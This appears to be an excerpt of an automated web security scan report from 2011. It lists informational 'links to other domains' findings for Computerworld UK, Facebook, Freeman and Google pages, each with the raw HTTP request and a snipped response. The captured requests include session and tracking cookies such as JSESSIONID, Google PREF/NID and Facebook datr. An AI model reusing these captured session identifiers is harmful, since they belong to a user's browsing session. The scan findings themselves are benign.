Build Real Clouds Today at the 2011 Red Hat Summit and JBoss World
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238919851;44243109;m?http://tinyurl.com/4ny24o2&SOURCE=00286560033370CTW2OHA4GP7XE" rel="nofollow" >
Learn how to optimize the value of business video with this informative white paper.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;236867262;44243108;h?http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2363480&PluID=0&ord=%n?&SOURCE=00283990033007CTWJWGY2OM7GL" rel="nofollow" >
Are you maximizing IT efficiency? Learn how to boost efficiency today.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239247626;44243109;h?http://clk.atdmt.com/M0N/go/310785675/direct/01/?&SOURCE=00289760033824CTWS30RT82JD0" rel="nofollow" >
Sprint Global MPLS. Voice, video, data-one network.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239066977;44243109;p?http://resources.idgenterprise.com/original/AST-0029695_FileMakerWP.pdf?&SOURCE=00258320033184CTWP7XQ8EOM2A" rel="nofollow" >
Read the white paper on fast iPad and iPhone development
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238989682;44243109;v?http://clk.atdmt.com/MRT/go/257477014/direct;wi.1;hi.1/01/&SOURCE=00284670033102CTWZ5NZONI05W" rel="nofollow" >
Meet the needs of IT and people with Windows.. Optimized Desktop
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;236280161;44243109;v?https://www.workday.com/landing_page/whitepaper_the_real_saas_manifesto_lp.php?camp=70180000000s06d&SOURCE=00280760032604CTWPI95PC399W" rel="nofollow" >
Don't be fooled by the fake SaaS. Read "The Real SaaS Manifesto" whitepaper.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238643178;44243109;i?http://altfarm.mediaplex.com/ad/ck/12309-124348-25192-2?mpt=DFP%eaid?&SOURCE=00280780032625CTWOHOSOAJC3R" rel="nofollow" >
Transform the way you store data and save up to 76% in network management costs
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;237906713;44243109;e?http://trustlto.com?&SOURCE=00280100032496CTW1L0C7TLRPV" rel="nofollow" >
Protect your data now and down the road. Use LTO-5 Tape!
</a>
...[SNIP]...

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_SECURITY&tr=MARKETPLACE&num=5&layt=1&fmt=simp"></script>
<a href="http://www.techwords.com" target="_blank"><img src="/common/images/site/quigo_adsbytechwords.gif" alt="Ads by TechWords" width="115" height="12" hspace="0" vspace="0" border="0" title="Ads by TechWords">
...[SNIP]...
<br />
<a href="http://www.techwords.com/" target="_blank" id="techwords_link">See your link here</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.computerworldmediakit.com" target="_blank">Advertise</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.cwsubscribe.com/cgi-win/cw.cgi?ADD" target="_blank">Subscribe to Computerworld Magazine</a>
...[SNIP]...
<li><a rel="nofollow" href="http://careers.idg.com">Jobs at IDG</a>
...[SNIP]...
<li><a href="http://www.cfoworld.com?source=ctwfooter" target="_blank">CFOworld</a>
...[SNIP]...
<li><a href="http://www.cio.com?source=ctwfooter" target="_blank">CIO</a>
...[SNIP]...
<li><a href="http://www.csoonline.com?source=ctwfooter" target="_blank">CSO</a>
...[SNIP]...
<li><a href="http://www.demo.com" target="_blank">DEMO</a>
...[SNIP]...
<li><a href="http://www.gamepro.com" target="_blank">GamePro</a>
...[SNIP]...
<li><a href="http://www.games.net" target="_blank">Games.net</a>
...[SNIP]...
<li><a href="http://www.idc.com" target="_blank">IDC</a>
...[SNIP]...
<li><a href="http://www.IDG.com" target="_blank">IDG</a>
...[SNIP]...
<li><a href="http://www.idgconnect.com" target="_blank">IDG Connect</a>
...[SNIP]...
<li><a href="http://www.idgknowledgehub.com" target="_blank">IDG Knowledge Hub</a>
...[SNIP]...
<li><a href="http://www.idgtechnetwork.com" target="_blank">IDG TechNetwork</a>
...[SNIP]...
<li><a href="http://www.idgventures.com" target="_blank">IDG Ventures</a>
...[SNIP]...
<li><a href="http://www.infoworld.com?source=ctwfooter" target="_blank">InfoWorld</a>
...[SNIP]...
<li><a href="http://www.itwhitepapers.com/index.php?source=ctwfooter" target="_blank">ITwhitepapers</a>
...[SNIP]...
<li><a href="http://www.itworld.com?source=ctwfooter" target="_blank">ITworld</a>
...[SNIP]...
<li><a href="http://www.javaworld.com?source=ctwfooter" target="_blank">JavaWorld</a>
...[SNIP]...
<li><a href="http://www.linuxworld.com?source=ctwfooter" target="_blank">LinuxWorld</a>
...[SNIP]...
<li><a href="http://www.macworld.com" target="_blank">Macworld</a>
...[SNIP]...
<li><a href="http://www.networkworld.com?source=ctwfooter" target="_blank">Network World</a>
...[SNIP]...
<li class="last_link"><a href="http://www.pcworld.com" target="_blank">PC World</a>
...[SNIP]...
<div>

            <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-203426h&amp;cg=0&amp;cc=1&amp;ts=noscript"

            width="1" height="1" alt="" />


            </div>
...[SNIP]...

19.128. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost&amp;embeds=true&amp;charset=utf-8&amp;services=digg%2Cslashdot%2Cstumbleupon%2Creddit%2Cmixx%2Cdelicious%2Ctechnorati%2Cyahoo_buzz%2Cfacebook&amp;style=default&amp;publisher=dff1640b-f471-4781-9319-20022d66580e&amp;linkfg=%236e6e6e"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Computerworlduk" title="Computerworld UK on Facebook" target="_blank" onclick="var s=s_gi(s_account);s.linkTrackVars='eVar13,events';s.linkTrackEvents='event6';s.events='event6';s.eVar13='sidebar;'+omnitureSection+';facebook';s.tl(this,'o','sidebar;'+omnitureSection+';facebook');"><img src="http://media.computerworlduk.com/graphics/socialMedia/facebook.png" alt="Facebook" width="24" height="25" />
...[SNIP]...
<li><a href="http://digg.com/ComputerwrldUK" title="Computerworld UK on Digg" target="_blank" onclick="var s=s_gi(s_account);s.linkTrackVars='eVar13,events';s.linkTrackEvents='event6';s.events='event6';s.eVar13='sidebar;'+omnitureSection+';digg';s.tl(this,'o','sidebar;'+omnitureSection+';digg');"><img src="http://media.computerworlduk.com/graphics/socialMedia/digg.png" alt="Digg" width="24" height="25" />
...[SNIP]...
<li><a href="http://twitter.com/computerworlduk" title="Computerworld UK on Twitter" target="_blank" onclick="var s=s_gi(s_account);s.linkTrackVars='eVar13,events';s.linkTrackEvents='event6';s.events='event6';s.eVar13='sidebar;'+omnitureSection+';twitter';s.tl(this,'o','sidebar;'+omnitureSection+';twitter');"><img src="http://media.computerworlduk.com/graphics/socialMedia/twitter.png" alt="Twitter" width="25" height="25" />
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=3204150" title="Computerworld UK on LinkedIn" target="_blank" onclick="var s=s_gi(s_account);s.linkTrackVars='eVar13,events';s.linkTrackEvents='event6';s.events='event6';s.eVar13='sidebar;'+omnitureSection+';linkedin';s.tl(this,'o','sidebar;'+omnitureSection+';linkedin');"><img src="http://media.computerworlduk.com/graphics/socialMedia/linked-in.png" alt="LinkedIn" width="24" height="25" />
...[SNIP]...
<p id="followTwitterConvo">Follow the conversation at @<a href="http://twitter.com/Think_Print" target="_blank">Think_Print</a>
...[SNIP]...
<noscript>
                       <a href="http://ad.uk.doubleclick.net/jump/new.computerworlduk.com/security1;dcopt=ist;;kw=news,NULL,NULL,;sz=468x60,728x90;ord=1303854549166?">
                           <img src="http://ad.uk.doubleclick.net/ad/new.computerworlduk.com/security1;dcopt=ist;;kw=news,NULL,NULL,;sz=468x60,728x90;ord=1303854549166?" border="0" alt="" />
                       </a>
...[SNIP]...
<p class="articleInfo">By Ellen Messmer | <a href="http://www.networkworld.com/" title="Network World US">Network World US</a>
...[SNIP]...
Alerts team has thanked it for the information provided about an "arbitrary URL redirect vulnerability" in www.java.com. YGN published advisory information about this vulnerability both on the public <a href="http://seclists.org/fulldisclosure/2011/Apr/388">SecLists online</a> and the <a href="http://yehg.net/lab/pr0js/advisories/sites/java.com/java.com_url_redirection">hacker group's own website</a>
...[SNIP]...
YGN and Oracle, which took place over the last week, seems to have followed a far different course than the hacker group's recent interaction with McAfee, which ended last month with YGN disclosing it <a href="http://www.networkworld.com/news/2011/032811-mcafee-security-holes.html" target="_blank">had found a vulnerability in the McAfee website</a>
...[SNIP]...
<p><a href="http://www.networkworld.com/topics/wan.html"></a>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
<li id="tweetArticle"><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script></li>
           <li id="diggArticle" class="last"><a href="http://digg.com/submit?url=http%3A%2F%2Fwww%2Ecomputerworlduk%2Ecom%2Fnews%2Fsecurity%2F3276305%2Foracle%2Dresponds%2Dto%2Dhacker%2Dgroup%2Dand%2Dpatches%2Djavacom%2Dvulnerability%2F%3Folo%3Drss&title=Oracle%20responds%20to%20hacker%20group%20and%20patches%20Java%2Ecom%20vulnerability" class="DiggThisButton DiggCompact"><span style="display:none">
...[SNIP]...
<noscript>
                   <a href="http://ad.uk.doubleclick.net/jump/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;ord=1303854549166?">
                       <img src="http://ad.uk.doubleclick.net/ad/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;ord=1303854549166?" border="0" alt="" />
                   </a>
...[SNIP]...
<noscript>
                   <a href="http://ad.uk.doubleclick.net/jump/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;ord=1303854549166?">
                       <img src="http://ad.uk.doubleclick.net/ad/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;ord=1303854549166?" border="0" alt="" />
                   </a>
...[SNIP]...
<noscript>
                   <a href="http://ad.uk.doubleclick.net/jump/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=468x60,728x90;ord=1303854549166?">
                       <img src="http://ad.uk.doubleclick.net/ad/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=468x60,728x90;ord=1303854549166?" border="0" alt="" />
                   </a>
...[SNIP]...
<li><a href="http://www.techworld.com" title="Visit Techworld" target="_blank">Techworld</a>
...[SNIP]...
<li><a href="http://www.cio.co.uk" title="Visit CIO UK" target="_blank">CIO UK</a>
...[SNIP]...
<li><a href="http://www.macworld.co.uk" title="Visit Macworld" target="_blank">Macworld</a>
...[SNIP]...
<li><a href="http://www.pcadvisor.co.uk" title="Visit PC Advisor" target="_blank">PC Advisor</a>
...[SNIP]...
<li><a href="http://www.macvideo.tv" title="Visit MacVideo" target="_blank">MacVideo</a>
...[SNIP]...
<li><a href="http://www.digitalartsonline.co.uk" title="Visit Digital Arts" target="_blank">Digital Arts</a>
...[SNIP]...
<li><a href="http://www.marketbase.co.uk" title="Visit Marketbase" target="_blank">Marketbase</a>
...[SNIP]...
<li><a href="http://www.cfoworld.co.uk" title="CFO World" target="_blank">CFO World</a>
...[SNIP]...

19.129. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?api_key=148695881829460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c4f8d2a4%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent.parent%26transport%3Dflash&font=arial&href=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145%2526refId%3DLIKE&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=360 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.18.57
X-Cnection: close
Date: Tue, 26 Apr 2011 18:46:08 GMT
Content-Length: 10569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/dyoQslueHwx.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

19.130. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/?scope=web&mkt=en-US&FORM=MSMONY
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.47
X-Cnection: close
Date: Tue, 26 Apr 2011 18:38:53 GMT
Content-Length: 8536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

19.131. http://www.freemanco.com/freemanco/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /freemanco/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /freemanco/?fs=true&_requestid=118715 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:10:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
Content-Type: text/html;charset=UTF-8
Content-Length: 21405


           <!DOCTYPE html PUBLIC
   "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/freemanco/styles/image-slideshow.css" >

   <link href='http://fonts.googleapis.com/css?family=Nobile:regular,italic,bold,bolditalic' rel='stylesheet' type='text/css'>

   <!--[if IE 8]>
...[SNIP]...
<noscript>
           <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&amp;ActivityID=38733&amp;ns=1"/>
       </noscript>
...[SNIP]...
<div class="followLinks">
       <a class="twitter first" href="http://twitter.com/freemanco"><img src="/images/freemanco/common/follow-twitter.png" /></a>
       <a class="facebook" href="http://www.facebook.com/freemanfans"><img src="/images/freemanco/common/follow-facebook.png" /></a>
       <a class="linkedin" href="http://www.linkedin.com/groups?gid=2014660"><img src="/images/freemanco/common/follow-linkedin.png" /></a>
       <a class="youtube" href="http://www.youtube.com/user/FreemancoVideos"><img src="/images/freemanco/common/follow-youtube.png" />
...[SNIP]...

19.132. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Azia HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:11:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 44055

f94-wCe9....S....o...'..a..........c..v<!doctype html> <head> <title>Azia - Google Search</title> <script>window.google={kEI:"8TS3Tau4J9GWtwfAh_h9",kEXPI:"17259,24472,25907,27147,28514,28766,2888
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=lifsdpAPvgss0..L10819876623748152843','','9','','0CFwQtwIwCA')">Mr. Credo MAMA <em>
...[SNIP]...

19.133. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ita+travel HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:55:27 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81537

<!doctype html> <head> <title>ita travel - Google Search</title> <script>window.google={kEI:"LyO3TbLjMci1tge_6IykAQ",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29509,29685,29822",kCSI:{e:"1
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=ita+travel&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.itasoftware.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCMQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wZzi1o6GbE4J:www.itasoftware.com/+ita+travel&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCgQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.itasoftware.com/solutions/airlines/" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoADAA')">Airlines</a></div><div class=sld><a class=sla href="http://www.itasoftware.com/solutions/travelers/" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoATAA')">Travelers</a></div><div class=sld><a class=sla href="http://www.itasoftware.com/products/shopping-pricing/" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoAjAA')">Pricing &amp; Shopping</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.itasoftware.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoAzAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.itasoftware.com/products/shopping-pricing/on-the-fly.html" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBDAA')">OnTheFly</a></div><div class=sld><a class=sla href="http://www.itasoftware.com/products/" onmousedown="return clk(this.href,'','','','1','','0CC8QqwMoBTAA')">Products</a></div><div class=sld><a class=sla href="http://www.itasoftware.com/solutions/travel-distribution/" onmousedown="return clk(this.href,'','','','1','','0CDAQqwMoBjAA')">Travel Distributors</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.itasoftware.com/about/customers.html" onmousedown="return clk(this.href,'','','','1','','0CDEQqwMoBzAA')">Customers</a>
...[SNIP]...
<h3 class="r"><a href="http://www.itasoftware.com/solutions/travelers/" class=l onmousedown="return clk(this.href,'','','','2','','0CDQQFjAB')">Solutions for Travelers</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:h-h-yPfVNMgJ:www.itasoftware.com/solutions/travelers/+ita+travel&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDkQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.guardian.co.uk/technology/pda/2011/apr/11/google-search-engines-antitrust" class=l onmousedown="return clk(this.href,'','','','3','','0CDwQFjAC')">Google wins approval for <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1JW-mvzeZI8J:www.guardian.co.uk/technology/pda/2011/apr/11/google-search-engines-antitrust+ita+travel&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CEEQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ita-travel.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEIQFjAD')">Welcome to International <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:V6J2rKfcMfoJ:www.ita-travel.com/+ita+travel&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wired.com/epicenter/2011/04/google-ita/" class=l onmousedown="return clk(this.href,'','','','5','','0CEkQFjAE')">Feds Clear Google to Buy <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:b7rgCbSrIQwJ:www.wired.com/epicenter/2011/04/google-ita/+ita+travel&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CE4QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://thenextweb.com/google/2011/04/08/google-is-your-new-travel-agent-ita-acquisition-approved/" class=l onmousedown="return clk(this.href,'','','','6','','0CE8QFjAF')">Google is your new <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UGs49oEhc0IJ:thenextweb.com/google/2011/04/08/google-is-your-new-travel-agent-ita-acquisition-approved/+ita+travel&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFQQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techcrunch.com/2010/10/26/google-ita-travel-no-fair/" class=l onmousedown="return clk(this.href,'','','','7','','0CFUQFjAG')">Google&#39;s Proposed <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:8T6aZOqxCGwJ:techcrunch.com/2010/10/26/google-ita-travel-no-fair/+ita+travel&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFoQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://tinet.ita.doc.gov/" class=l onmousedown="return clk(this.href,'','','','8','','0CFwQFjAH')">Welcome to Tourism Industries</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:H-20jopQfisJ:tinet.ita.doc.gov/+ita+travel&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nytimes.com/2011/04/09/technology/09google.html" class=l onmousedown="return clk(this.href,'','','','9','','0CGMQFjAI')">Google Is Cleared to Buy <em>
...[SNIP]...
<h3 class="r"><a href="http://www.reuters.com/article/2010/07/02/us-google-idUSTRE66050K20100702" class=l onmousedown="return clk(this.href,'','','','10','','0CGkQFjAJ')">Google to buy <em>
...[SNIP]...
